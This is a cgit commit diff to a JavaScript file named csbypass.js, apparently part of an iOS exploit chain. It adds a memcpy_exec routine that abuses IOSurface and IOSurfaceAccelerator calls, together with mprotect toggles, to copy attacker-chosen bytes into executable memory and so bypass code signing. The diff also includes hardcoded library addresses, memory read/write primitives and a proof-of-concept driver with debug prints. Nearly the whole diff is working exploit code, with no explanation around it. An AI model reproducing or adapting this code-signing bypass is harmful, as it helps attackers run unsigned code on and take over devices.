summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rw-r--r--src/js/csbypass.js47
1 files changed, 44 insertions, 3 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index b46880a..f987e55 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -7,6 +7,7 @@ var kCFTypeDictionaryValueCallBacks_addr = 0x343c79fc;
var CFDictionarySetValue_addr = 0x2080a791;
var CFNumberCreate_addr = 0x2080bc79;
var kCFNumberSInt32Type = 3;
+var kCFNumberSInt64Type = 4;
var CFShow_addr = 0x208e897c | 1;
var my_kIOSurfaceBytesPerRow;
@@ -15,6 +16,8 @@ var my_kIOSurfaceHeight;
var my_kIOSurfacePixelFormat;
var kCFAllocatorDefault;
+var kCFStringEncodingUTF8 = 0x08000100;
+
function csbypass() {
printf("hello from csbypass!\n");
poc();
@@ -41,7 +44,41 @@ function memcpy_exec(dst, src, size) {
CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, height));
CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, pixel_format));
printf("%d\n", callnarg(my_IOSurfaceAcceleratorCreate, 0, 0, accel));
- printf ("you can kill me now\n");
+ printf("you can kill me now\n");
+
+ printf("yahtzee1\n");
+
+ for (var i = 0; i < size; i += PAGE_SIZE) {
+ var kr = 0;
+ var target = shit_heap(4);
+ var srcaddr = shit_heap(4);
+ printf("yahtzee1\n");
+ write_u32(target, dst + i);
+ write_u32(srcaddr, src);
+ printf("yahtzee1 %x %x\n", dst, src);
+
+ printf("%x\n", CFStringCreateWithCString(read_u32(kCFAllocatorDefault), "IOSurfaceAddress", kCFStringEncodingUTF8));
+
+ CFDictionarySetValue(dict, CFStringCreateWithCString(read_u32(kCFAllocatorDefault), "IOSurfaceAddress", kCFStringEncodingUTF8), CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt64Type, srcaddr));
+ printf("yahtzee1\n");
+ var src_surf = callnarg(my_IOSurfaceCreate, dict);
+ printf("yahtzee1\n");
+ mprotect(target, PAGE_SIZE, PROT_READ | PROT_WRITE);
+ printf("yahtzee1\n");
+ CFDictionarySetValue(dict, CFStringCreateWithCString(read_u32(kCFAllocatorDefault), "IOSurfaceAddress", kCFStringEncodingUTF8), CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt64Type, target));
+ printf("yahtzee1\n");
+ var dest_surf = callnarg(my_IOSurfaceCreate, dict);
+ printf("yahtzee1\n");
+ mprotect(target, PAGE_SIZE, PROT_READ | PROT_EXEC);
+ printf("yahtzee1\n");
+ mlock(target, PAGE_SIZE);
+ printf("yahtzee1\n");
+ kr = callnarg(my_IOSurfaceAcceleratorTransferSurface, accel, src_surf, dest_surf, 0, 0);
+ printf("kr2=0x%08x\n", kr);
+ printf("yahtzee1\n");
+}
+
+ return dst;
}
function linkIOSurface() {
@@ -68,7 +105,8 @@ function poc() {
linkIOSurface();
var tmp = malloc(0x4000);
- var start = [0x4F, 0xF0, 0x82, 0x40, 0x00, 0x47];
+// var start = [0x4F, 0xF0, 0x82, 0x40, 0x00, 0x47];
+ var start = [0x44, 0x43, 0x42, 0x41];
for (var i = 0; i < start.length; i++) {
write_u8(tmp + i, start[i]);
@@ -76,7 +114,10 @@ function poc() {
var finish = 0x10000;
- memcpy_exec(finish. tmp, 0x1000);
+ printf("%x\n", read_u32(0x10000));
+ printf("yahtzee\n");
+ memcpy_exec(finish, tmp, 0x1000);
+ printf("%x\n", read_u32(0x10000));
scall("printf", "%x %x %x %x %x %x %x %x %x %x %x %x %x\n", h, my_kIOSurfaceBytesPerRow, my_kIOSurfaceWidth, my_kIOSurfaceHeight, my_kIOSurfacePixelFormat, my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface, 0x41414141);
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:04:38 +0000